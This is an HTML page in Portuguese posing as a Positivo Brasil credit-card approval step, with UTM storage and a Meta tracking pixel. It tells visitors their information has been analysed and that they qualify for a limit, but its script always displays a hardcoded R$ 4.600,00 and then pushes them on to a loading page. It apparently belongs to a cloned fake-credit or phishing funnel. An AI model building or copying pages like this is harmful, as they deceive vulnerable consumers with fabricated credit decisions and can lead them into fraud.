<!DOCTYPE html><html lang="pt-BR"><head>
    <meta charset="UTF-8">
    <link href="css/ooSXOBDjbG06.css" rel="stylesheet">
    <meta name="viewport" content="width=device-width,initial-scale=1">
  
  
    <script>
        // Função para obter os parâmetros UTM da URL
        function getUTMParameters() {
            const urlParams = new URLSearchParams(window.location.search);
            const utmParams = {};
        
            // Verifica se existem parâmetros UTM e os armazena em um objeto
            ['utm_source', 'utm_medium', 'utm_campaign', 'utm_term', 'utm_content'].forEach(param => {
                const value = urlParams.get(param);
                if (value) {
                    utmParams[param] = value;
                }
            });
        
            return utmParams;
        }
        
        // Armazena os parâmetros UTM no localStorage
        function storeUTMParameters(utmParams) {
            if (Object.keys(utmParams).length > 0) {
                localStorage.setItem('utmParams', JSON.stringify(utmParams));
            }
        }
        
        // Adiciona os parâmetros UTM armazenados em todas as URLs da página
        function appendUTMParametersToLinks() {
            const storedUTM = JSON.parse(localStorage.getItem('utmParams'));
            if (!storedUTM) return;
        
            const allLinks = document.querySelectorAll('a[href]');
            allLinks.forEach(link => {
                const url = new URL(link.href);
                Object.keys(storedUTM).forEach(param => {
                    url.searchParams.set(param, storedUTM[param]);
                });
                link.href = url.toString();
            });
        }
        
        // Quando a página carregar, captura os parâmetros UTM e os armazena
        document.addEventListener('DOMContentLoaded', () => {
            const utmParams = getUTMParameters();
            storeUTMParameters(utmParams);
            appendUTMParametersToLinks();
        });
        </script>
  
  
    <style>
        .header {
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(250, 99, 160) 93.4%);
            color: white;
            padding: 15px 0;
            text-align: center;
            font-size: 1.5rem;
            font-weight: bold;
            grid-area: top-bar;
        }

        .main-content {
            max-width: 450px;
            background-color: white;
            text-align: center;
            padding: 2rem 2rem 1rem 2rem;
            border-radius: 10px;
            box-shadow: 0 2px 40px rgba(0, 0, 0, 0.1);
            margin: 0 auto;
        }

        .main-content h2 {
            margin-bottom: 20px;
        }

        .btn-custom {
            color: white;
            border: none;
            width: 100%;
            margin-bottom: 10px;
            background: radial-gradient(934px at 6% 39.5%, rgb(0, 173, 202) 0.2%, rgb(0, 73, 144) 54.8%, rgb(255, 0, 0) 93.4%);
            font-weight: 600;
            border-radius: 1rem;
            padding: .75rem 3rem;
            letter-spacing: .3px;
            line-height: 1.15;
        }

        .btn-custom:hover {
            color: black !important;
            background-color: #00adca !important;
            transform: scale(1.02) !important;
        }

        .footer {
            background-color: #ffffff;
            border-top: solid 1px #e6dddd;
            color: #000;
            text-align: center;
            width: 100%;
            bottom: 0;
            grid-area: footer;
            border-bottom: solid 3px #e6007e;
            padding: 2rem 0.5rem;
            position: relative;
            margin-top: 50px;
        }

        #conclusao {
            display: none;
            /* Esconde o elemento por padrão */
        }

        #conclusao h4 {
            color: green;
            /* Define a cor do texto */
            font-weight: bold;
            /* Define o texto em negrito */
        }

        .char {
            border-top: solid px #00adca;
            background-color: #00adca;
            padding: 2px !important;
        }

        /* End custom CSS */
    </style>

    <!-- Meta Pixel Code -->
<script>
    !function(f,b,e,v,n,t,s)
    {if(f.fbq)return;n=f.fbq=function(){n.callMethod?
    n.callMethod.apply(n,arguments):n.queue.push(arguments)};
    if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';
    n.queue=[];t=b.createElement(e);t.async=!0;
    t.src=v;s=b.getElementsByTagName(e)[0];
    s.parentNode.insertBefore(t,s)}(window, document,'script',
    'https://connect.facebook.net/en_US/fbevents.js');
    fbq('init', '1249577276382820');
    fbq('track', 'PageView');
    fbq('track', 'ViewContent');
    </script>
    <noscript><img height="1" width="1" style="display:none"
    src="https://www.facebook.com/tr?id=1249577276382820&ev=PageView&noscript=1"
    /></noscript>
    <!-- End Meta Pixel Code -->
    
    
</head>

<body>
    <div style="
    display: grid;
    grid-template-areas:
      'top-bar'
      'content'
      'footer';
    grid-template-rows: auto 1fr auto;
    min-height: 100vh;
  ">
        <div class="header">
            <img decoding="async" style="width: 120px;" src="images/NyuxbtckY4ql.png" alt="Imagem Centralizada" data-lazy-src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" data-ll-status="loaded" class="entered lazyloaded"><noscript><img decoding="async" style="width: 120px;" src="https://d9hhrg4mnvzow.cloudfront.net/lp.posicard.com.br/834c63b6-logo-branco2_105e038000000000000000.png" alt="Imagem Centralizada"></noscript>
        </div>

        <div style="grid-area: content; padding: 0 1rem;">
            <div style="margin-top: 40px;" class="main-content">
                <div id="analise-secao" class="mb-3" style="display: block;">
                    <p id="mensagem-analise"><strong></strong> Analisamos suas informações e notamos que este é o <strong> primeiro cartão </strong> que você solicita conosco. Sendo assim, não conseguimos <strong> liberar limites </strong> acima de R$ 5.000,00. Mas não se preocupe,
                        nosso sistema consegue liberar um cartão para você com um limite de até:</p>
                    <div style="background-color: #f0f0f0; padding: 15px; border-radius: 8px;" class="justify-content-center">
                        <p id="mostraValor" style="font-size: 22px; font-weight: 600;">R$ ****</p>
                        <button onclick="verLimite()" class="show-limite" id="edab37aa-8d4e-7255-9820-4ff1a573e239"> ver limite <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--mdi" data-v-26951280="" style="" width="1em" height="1em" viewBox="0 0 24 24"><path fill="currentColor" d="M12 9a3 3 0 0 1 3 3a3 3 0 0 1-3 3a3 3 0 0 1-3-3a3 3 0 0 1 3-3m0-4.5c5 0 9.27 3.11 11 7.5c-1.73 4.39-6 7.5-11 7.5S2.73 16.39 1 12c1.73-4.39 6-7.5 11-7.5M3.18 12a9.821 9.821 0 0 0 17.64 0a9.821 9.821 0 0 0-17.64 0"></path></svg></button>
                    </div>
                    <p>Podemos prosseguir com a solicitação do cartão?</p>
                    <button class=" btn-custom rounded-pill" onclick="location.href='../carregando/index.html'">Sim, pode!</button>
                </div>
            </div>


            <script>
                function mostrarPagina(paginaId) {
                    // Esconde todas as seções
                    document.getElementById('analise-secao').style.display = 'none';

                    // Verifica se 'dadosUsuarioUni' existe no localStorage
                    const dadosUsuario = localStorage.getItem('dadosUsuarioUni');
                    if (dadosUsuario) {
                        const dados = JSON.parse(dadosUsuario);
                        const primeiroNome = dados.nome.split(' ')[0]; // Obtém o primeiro nome
                        console.log("usuarios==>", primeiroNome);
                        if (paginaId === 'analise-secao') {
                            // Atualiza a mensagem de análise com o nome do usuário
                            const mensagemAnalise = `<strong>${primeiroNome}</strong>, analisamos suas informações e notamos que este é o <strong> primeiro cartão </strong> que você solicita conosco. Sendo assim, não conseguimos <strong> liberar limites </strong> acima de R$ 5.000,00. Mas não se preocupe, nosso sistema consegue liberar um cartão para você com um limite de até:`;
                            document.getElementById('mensagem-analise').innerHTML = mensagemAnalise;
                        }
                    }

                    // Mostra a seção desejada
                    document.getElementById(paginaId).style.display = 'block';
                }

                function verLimite() {
                    document.getElementById('mostraValor').innerHTML = "R$ 4.600,00";
                    // alert("O seu limite é de R$ 4.600,00"); // Exemplo de limite. Substitua pelo valor real conforme necessário.
                }

                // Chamar a função onde for necessário, por exemplo, ao carregar uma nova seção
                mostrarPagina('analise-secao');
            </script>
        </div>
        <div class="footer py-4" id="footerChg">
            © 2024 Positivo Brasil. CNPJ 36.401.269/0001-27. <br> Todos os direitos reservados
        </div>
    </div>
</body></html>